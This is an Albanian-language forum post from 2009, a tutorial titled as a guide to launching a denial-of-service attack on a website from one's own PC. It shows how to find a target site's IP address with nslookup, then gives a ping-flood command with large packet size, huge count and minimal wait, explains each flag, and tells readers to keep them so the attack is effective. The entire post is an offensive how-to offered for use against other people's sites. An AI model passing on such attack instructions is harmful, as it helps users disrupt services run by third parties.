Si te organizojme nje DoS attack nga PC i yni ne nje Web

  avatar
  Mr.Problem

  Posts : 117
  Reputation : 0
  Join date : 23/12/2009

  Si te organizojme nje DoS attack nga PC i yni ne nje Web Empty Si te organizojme nje DoS attack nga PC i yni ne nje Web

  Mesazh nga Mr.Problem prej Wed Dec 23, 2009 6:03 pm

  ---------------------------------------------------
  ---------------------------------------------------

  Se pari te ju spjegoje se qka eshte DoS ?

  Denial of Service (DoS) jane sulme te ashpra ndaj nje kompjuteri i vetem , ose nje website ,qe te pengoje qllimisht punen e tyre.

  Qka ju nevoitet ?
  1- Command Prompt (CMD ose DOS) te cilin qdo windows e ka LOL.
  2- Ip-Addressa e faqes te ciles doni tja msyni ;D.

  Lind pyetja se si te marr IP te nje site qe po du me ja ba DoS ?
  kush nuk din skeni qa te habitni ne kete pjese se eshte lehte dhe do te ju spjegoj se si ta beni kete !
  -Shkoni ne CMD(command prompt) dhe aty shkruani :

  Kodi:
  nslookup emri i site-itP.SH

  Kodi:
  nslookup www.rrjeta.orgDo te ju del aty pak me poshte tani IP adresa e shenjestres

  OK nese keni shku sipas hapat mire , atehere do te jeni gati te sulmoni nje faqe apo Server

  -Ne CMD shkruani kete kode qe te sulmoni :

  Kodi:
  ping IP e faqes -l 65500 -n 10000000 -w 0.00001-n 10000000= kjo eshte vlera e DoS attemps-ave mund ta ndryshoni mvaret sa doni me ba ju se sa shpesh me qu kerkese aty ne faqe .

  IP e faqes kete text e zvendesoni me IP te faqes te ciles ja keni nxjerr .

  -w 0.00001 = Kjo eshte koha qe duhet te pritet pas nje sulmi te PIngut

  Verejtej :
  Mos i largoni -l, -n dhe -w nga komanda sepse atakimi juaj nuk do te jete i efektshem.


  Ky tutorial u krijua nga une , per qellim te aftesimit te njerzve rreth Hacking-ut
  Shpresoj se do te ju pelqen tutoriali ,

  P.S
  Ju kisha lut edhe pse kam shenuar aty rrjeta.org te mos perovni ta sulmoni sepse eshte nje forum i cili nuk meriton ti beni sulme

   Ora është Wed Jun 19, 2019 12:44 am